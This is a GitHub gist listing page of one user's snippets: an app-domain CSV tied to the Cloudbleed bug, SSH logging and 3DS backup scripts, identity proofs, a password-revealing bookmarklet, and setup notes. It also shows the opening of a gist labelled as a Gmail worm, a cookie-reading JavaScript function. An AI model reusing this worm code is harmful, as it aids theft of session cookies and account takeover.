Skip to content

Instantly share code, notes, and snippets.

@veritas06
veritas06 / ios_apps.csv
Created February 24, 2017 21:46 — forked from dweinstein/ios_apps.csv
Sample of popular apps observed (via dynamic analysis) to possibly use Cloudflare https://www.nowsecure.com/blog/2017/02/23/cloudflare-cloudbleed-bugs-impact-mobile-apps
application_id package_name title version_string domain
282935706 tv.lifechurch.bible Bible 7.2 cloudflare.com
284910350 com.yelp.yelpiphone Yelp 11.4.0 cloudflare.com
290853822 net.box.BoxNet Box for iPhone and iPad 4.0.1 cloudflare.com
300255638 com.abcnews.ABCNews ABC News – Watch Breaking US & World News, Live Video & Election Coverage 5.10.0 cloudflare.com
304154888 com.nicusa.FBIMostWanted Most Wanted 2.3 cloudflare.com
319881193 com.grindrguy.grindrx Grindr - Gay, bi, social networking and dating app to chat and meet guys 3.0.13 cloudflare.com
322439990 com.fboweb.MyRadar MyRadar NOAA Weather Radar – Forecasts, Storms, and Earthquakes 4.4.4 cloudflare.com
327630330 com.getdropbox.Dropbox Dropbox 28.2 cloudflare.com
329913454 com.crunchyroll.iphone Crunchyroll - Everything Anime 3.00.2 cloudflare.com
@veritas06
veritas06 / gmail-worm.php
Last active October 31, 2017 21:33 — forked from bevacqua/gmail-worm.php
[Gmail Worm] The worm that was gonig through Gmail accounts #PHP #Gmail #Google #worm
g.php:
<html>
<head>
<script type="text/javascript">
function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
@veritas06
veritas06 / keybase.md
Last active October 31, 2017 21:35
[KeyBase Proof] Proof of my accounts through KeyBase #auth #KeyBase

Keybase proof

I hereby claim:

  • I am veritas06 on github.
  • I am v3ritas (https://keybase.io/v3ritas) on keybase.
  • I have a public key ASCp85LE63pVowhqNMlh7pWs7H-mgbBhPA80uSJsqcGTRwo

To claim this, I am signing this object:

@veritas06
veritas06 / log_ssh.sh
Last active November 12, 2017 20:25
[Log SSH Session] Begins an SSH session with logging, at \home\<CurrentUser>\Logs\SSH.log #bash #ssh
#!/bin/bash
# Script to log each SSH session
# Create Log Directory
# CurrentUser="whoami" # Not needed
# mkdir "/home/$USER/Logs"
# mkdir "/home/$CurrentUser/Logs/"
# $LogDirectory="/home/$USER/Logs/"
# if [ ! -d "$LogDirectory" ]; then
@veritas06
veritas06 / Backup EmuNAND.gm9
Last active December 2, 2017 19:09
[3DS Custom Firmware Scripts] A copy of the GM9 scripts used in DS CFW #Nintendo #Homebrew #3DS #2DS
# EmuNAND backup GM9 script
# This will create a backup named [DATESTAMP]_[SERIAL]_emunand_???.bin
# author: d0k3
set ERRORMSG "EmuNAND backup failed"
set SUCCESSMSG "EmuNAND backup success"
ask "Create a EmuNAND backup in $[GM9OUT]?"
findnot $[GM9OUT]/$[DATESTAMP]_$[SERIAL]_emunand_???.bin OUTPATH
cp -h E:/nand_minsize.bin $[OUTPATH]
@veritas06
veritas06 / blockstack_verification.txt
Created March 5, 2018 19:17
BlockStack Verification
Verifying my Blockstack ID is secured with the address 1ApGuA3dtcXWCRGoRsAdti1V7TzVZN47AT https://explorer.blockstack.org/address/1ApGuA3dtcXWCRGoRsAdti1V7TzVZN47AT
@veritas06
veritas06 / RevealPasswords.js
Created January 8, 2018 20:24
[Reveal Passwords Bookmarklet] This javascript item will reveal passwords in a browser, instead of displaying *** #JavaScript #Bookmarklet
javascript:(function()%7Bvar%20IN,F;IN=document.getElementsByTagName('input');for(var%20i=0;i%3CIN.length;i++)%7BF=IN%5Bi%5D;if(F.type.toLowerCase()=='password')%7Btry%7BF.type='text'%7Dcatch(r)%7Bvar%20n,Fa;n=document.createElement('input');Fa=F.attributes;for(var%20ii=0;ii%3CFa.length;ii++)%7Bvar%20k,knn,knv;k=Fa%5Bii%5D;knn=k.nodeName;knv=k.nodeValue;if(knn.toLowerCase()!='type')%7Bif(knn!='height'&&knn!='width'&!!knv)n%5Bknn%5D=knv%7D%7D;F.parentNode.replaceChild(n,F)%7D%7D%7D%7D)()
@veritas06
veritas06 / PS-GetPublicIP.ps1
Created October 26, 2018 18:48
[PS: Get External \ Public IP Address] Get the public IP through PowerShell #PowerShell
$ipinfo = Invoke-RestMethod http://ipinfo.io/json
$ipinfo.ip
$ipinfo.hostname
$ipinfo.city
$ipinfo.region
$ipinfo.country
$ipinfo.loc
$ipinfo.org
BEGIN MESSAGE.
W0epoFoIRapVBJq Vqg7htXkfwccqfX RiWJpeu30p0JaHW NGmJqfVzYUPuu77
pVwVlxEfxWSLTxd NK1F4rGrkTKTCKq 6Xr2MZHgg6m3T3e ajA9Q8xvZWNhqe0
Gz5N4Tto9CqnSkv uT7tRnTuLuuWnZR p0MguZyJsb0GOPV xsAn6MrRbQf6qLY
3wHcbyRlEw47YB1 Ca3tkWX7gHmDz2D wYOwC29HFxl.
END MESSAGE.
@veritas06
veritas06 / calibre-web-add-books.md
Created August 6, 2024 12:56
How to add new books to Calibre-Web

Add New Books to Calibre-Web

August 06, 2024

  • I must not have had this command saved anywhere, so when I had to setup Calibre-Web again, it took me a little while to figure it out again.
  • First, need to get metadata.db if you don't already have one. I placed mine in .../Calibre-web/config/ with the rest of the generated files.
  • To actually load the books, I needed to use a shell on that container & run the calibredb command:

docker exec -it <<CONTAINER_NAME>> /bin/bash calibredb add --add /eBook_Source/ --with-library /books